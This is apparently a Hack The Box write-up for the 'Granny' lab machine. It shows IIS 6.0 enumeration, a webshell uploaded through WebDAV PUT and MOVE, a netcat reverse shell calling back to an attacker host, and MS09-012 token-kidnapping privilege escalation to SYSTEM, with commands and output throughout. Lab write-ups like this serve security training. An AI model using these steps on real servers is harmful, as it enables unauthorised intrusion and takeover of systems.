Granny - Hack The Box
“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”
██╗ ██╗███████╗███████╗██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║███████╗█████╗ ██████╔╝ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ╚██████╔╝███████║███████╗██║ ██║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
-
[root:/git/htb/granny]# nmap -Pn -n -sCV 10.10.10.15 –open (master) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Server Type: Microsoft-IIS/6.0 | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | WebDAV type: Unknown | Server Date: Tue, 02 Mar 2021 14:46:58 GMT | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
-
We instantly see that it’s IIS 6.0 and webdab seems to be open. Run davtest to find out more.
[root:/git/htb/granny]# davtest -url http://10.10.10.15 (master✱) ******************** Testing DAV connection OPEN SUCCEED: http://10.10.10.15 ******************** NOTE Random string for this session: YDySC7gsiCC ******************** Creating directory MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_YDySC7gsiCC ******************** Sending test files PUT php SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.php PUT cgi FAIL PUT asp FAIL PUT txt SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt PUT shtml FAIL PUT pl SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.pl PUT aspx FAIL PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jsp PUT html SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jhtml PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.cfm ******************** Checking for test file execution EXEC php FAIL EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt EXEC pl FAIL EXEC jsp FAIL EXEC html SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html EXEC jhtml FAIL EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_YDySC7gsiCC
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.php
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.pl
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jsp
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jhtml
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.cfm
Executes: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt
Executes: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html
Unfortunatley we are unable to upload aspx, otherwise this would be an easy webshell. However, method ‘MOVE’ is allowed, meaning we can move already uploaded files and change their filename (and ending).
[root:/git/htb/granny]# mv shell.aspx shell.txt (master✱)
[root:/git/htb/granny]# curl http://10.10.10.15/ --upload-file shell.txt (master✱)
[root:/git/htb/granny]# curl -X MOVE --header "Destination:http://10.10.10.15/shell.aspx" http://10.10.10.15/shell.txt
Browse for RCE: http://10.10.10.15/shell.aspx
OR USING CADAVER: cadaver http://granny.htb mput fil.txt mv fil.txt fil.aspx
-
Executing nc64.exe for a reverse shell directly through my smb share doesn’t work, so upload nc64.exe the same way.
[root:/git/htb/granny]# cp /opt/nc64.exe nc64.txt [root:/git/htb/granny]# curl http://10.10.10.15/ –upload-file nc64.txt (master✱) [root:/git/htb/granny]# curl -X MOVE –header “Destination:http://10.10.10.15/nc64.exe” http://10.10.10.15/nc64.txt
Enumerating the box we find that nc64.exe is uploaded to ‘c:\Inetpub\wwwroot\nc64.exe’ Trying to execute the binary gives nothing: c:\Inetpub\wwwroot\nc64.exe 10.10.14.8 4488 -e cmd Lets try nc.exe instead; [root:/git/htb/granny]# mv nc.exe nc.txt (master✱) [root:/git/htb/granny]# curl http://10.10.10.15/ –upload-file nc.txt (master✱) [root:/git/htb/granny]# curl -X MOVE –header “Destination:http://10.10.10.15/nc.exe” http://10.10.10.15/nc.txt Execute RCE: c:\Inetpub\wwwroot\nc.exe 10.10.14.8 4488 -e powershell
[root:/git/htb/granny]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1082
[root:/git/htb/granny]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1083
We get a incomming connection, however the shell dies instantly. Lets try cmd instead of powershell.
Execute RCE: c:\Inetpub\wwwroot\nc.exe 10.10.14.8 4488 -e cmd
[root:/git/htb/granny]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1085
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
- Grab the ‘systeminfo’ and use windows-exploit-suggester.
[root:/git/htb/granny]# python /opt/windows-exploit-suggester.py –update (master✱) [] initiating winsploit version 3.3… [+] writing to file 2021-03-02-mssb.xls [] done [root:/git/htb/granny]# python /opt/windows-exploit-suggester.py –database 2021-03-02-mssb.xls –systeminfo systeminfo.txt [+] [E] exploitdb PoC, [M] Metasploit module, [] missing bulletin [+] windows version identified as ‘Windows 2003 SP2 32-bit’ [] [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC [] https://www.exploit-db.com/exploits/37367/ – Windows ClientCopyImage Win32k Exploit, MSF [] [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical [] https://www.exploit-db.com/exploits/39035/ – Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC [] https://www.exploit-db.com/exploits/37098/ – Microsoft Windows - Local Privilege Escalation (MS15-010), PoC [] https://www.exploit-db.com/exploits/39035/ – Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC [] [E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important [] http://www.exploit-db.com/exploits/35936/ – Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC [] [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical [] http://www.exploit-db.com/exploits/35474/ – Windows Kerberos - Elevation of Privilege (MS14-068), PoC [] [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [] https://www.exploit-db.com/exploits/37800// – Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [] http://www.exploit-db.com/exploits/35308/ – Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [] http://www.exploit-db.com/exploits/35229/ – Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC [] http://www.exploit-db.com/exploits/35230/ – Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [] http://www.exploit-db.com/exploits/35235/ – MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [] http://www.exploit-db.com/exploits/35236/ – MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [] [M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important [] http://www.exploit-db.com/exploits/34112/ – Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC [] http://www.exploit-db.com/exploits/34982/ – Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation [] [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [] http://www.exploit-db.com/exploits/35101/ – Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF [] [E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important [] https://www.exploit-db.com/exploits/39525/ – Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC [] https://www.exploit-db.com/exploits/39446/ – Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC [] [E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical [E] MS14-029: Security Update for Internet Explorer (2962482) - Critical [] http://www.exploit-db.com/exploits/34458/ [] [E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important [] http://www.exploit-db.com/exploits/35280/, – .NET Remoting Services Remote Command Execution, PoC [] [M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical [M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important [E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important [M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical [M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important [M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical [M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical [M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical [M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [] http://www.exploit-db.com/exploits/35273/ – Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [] http://www.exploit-db.com/exploits/34815/ – Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [] [M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical [M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important [M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important [M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important [M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical [M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical [M] MS08-078: Security Update for Internet Explorer (960714) - Critical [] done
MS14-070:
No output when executing binary
MS15-051:
Froze/crashed shell
MS14-068:
C:\Inetpub\wwwroot> //10.10.14.8/share/MS14-068.exe
Traceback (most recent call last):
File "<string>", line 14, in <module>
File "Z:\usr\share\pyinstaller\PyInstaller-3.1.1\PyInstaller\loader\pyimod03_importers.py", line 315, in load_module
File "Z:\usr\share\pyinstaller\PyInstaller-3.1.1\PyInstaller\loader\pyimod02_archive.py", line 323, in extract
IOError: [Errno 9] Bad file descriptor
ms14-068 returned -1
MS15-010:
C:\Inetpub\wwwroot> //10.10.14.8/share/39035.exe
The image file \\10.10.14.8\share\39035.exe is valid, but is for a machine type other than the current machine.
MS14-040:
C:\Inetpub\wwwroot> //10.10.14.8/share/MS14-40-x86.exe
[+] creating socket...
[+] got sock 0x668
[+] sock connected.
[+] GO!
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x80800000L
[+] HalDispatchTable address: 0x8088e078L
Traceback (most recent call last):
File "<string>", line 158, in <module>
TypeError: unsupported operand type(s) for +: 'NoneType' and 'int'
-
None of the exploits are giving anything of use. Googling about ‘windows 2003 privilege escalation’ and we find MS09-012, Privelege Escalation via Token Kidnapping.
Setup a local SMB Server again and try the exploit:
[root:/srv/pub-share]# smbserver.py share . [root:/srv/pub-share]# cp /opt/windows-kernel-exploits/MS09-012/pr.exe .
C:\Documents and Settings> //10.10.14.8/share/pr.exe “whoami” /xxoo/–>Build&&Change By p /xxoo/–>This exploit gives you a Local System shell /xxoo/–>Got WMI process Pid: 1756 begin to try /xxoo/–>Found token SYSTEM /xxoo/–>Command:whoami nt authority\system
It works, we are nt authority\system! Grab user- and root.txt
C:\Documents and Settings> //10.10.14.8/share/pr.exe “type Lakis\Desktop\user.txt” /xxoo/–>Build&&Change By p /xxoo/–>This exploit gives you a Local System shell /xxoo/–>Got WMI process Pid: 1756 begin to try /xxoo/–>Found token SYSTEM /xxoo/–>Command:type Lakis\Desktop\user.txt 700c5dc163014e22b3e408f8703f67d1
C:\Documents and Settings> //10.10.14.8/share/pr.exe “type Administrator\Desktop\root.txt” /xxoo/–>Build&&Change By p /xxoo/–>This exploit gives you a Local System shell /xxoo/–>Got WMI process Pid: 3564 begin to try /xxoo/–>Found token SYSTEM /xxoo/–>Command:type Administrator\Desktop\root.txt aa4beed1c0584445ab463a6747bd06e9
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██████╗ ██████╗ ██████╗ ████████╗ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██████╔╝██║ ██║██║ ██║ ██║ ██╔══██╗██║ ██║██║ ██║ ██║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
- -
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
MS09-012: https://medium.com/@nmappn/windows-privelege-escalation-via-token-kidnapping-6195edd2660e https://www.exploit-db.com/exploits/6705